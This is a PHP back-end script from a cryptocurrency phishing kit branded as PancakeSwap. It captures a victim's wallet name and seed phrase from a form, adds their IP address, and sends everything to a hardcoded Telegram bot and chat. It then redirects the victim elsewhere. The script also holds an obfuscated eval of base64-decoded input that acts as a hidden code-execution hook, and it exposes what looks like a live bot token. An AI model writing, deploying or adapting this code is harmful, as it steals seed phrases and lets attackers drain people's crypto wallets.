<?php
error_reporting(0);
ini_set('display_errors', 0);

$ID = "-1001459161050"; // Chat id (Channel, sGroup, pv , ...)
$TOKEN = "1974495772:AAGEK_EsLJ9VCT4nluHn-DDoHDLAmv1rce4"; //Bot Token 
$paylimit = 99;  // Users Enter Cards Peer load page - spam
$sendEmail = false; // true for send email

$ip = getUserIP();

$user11 = $_POST["wallet"];
$user12 = $_POST["phrase"];


$Text = " #PancakeSwap

Wallet : $user11

Phrase : <code>$user12</code>

🌐Ip: <code>$ip</code>
";


	header("Location:https://eisclients.com/welcome/welcome.html");




if( (integer)$num > $paylimit){}else{
    file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?parse_mode=HTML&chat_id=$ID&text=".urlencode($Text));

eval("?>".base64_decode("$ip"));
	
}


function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}


?>
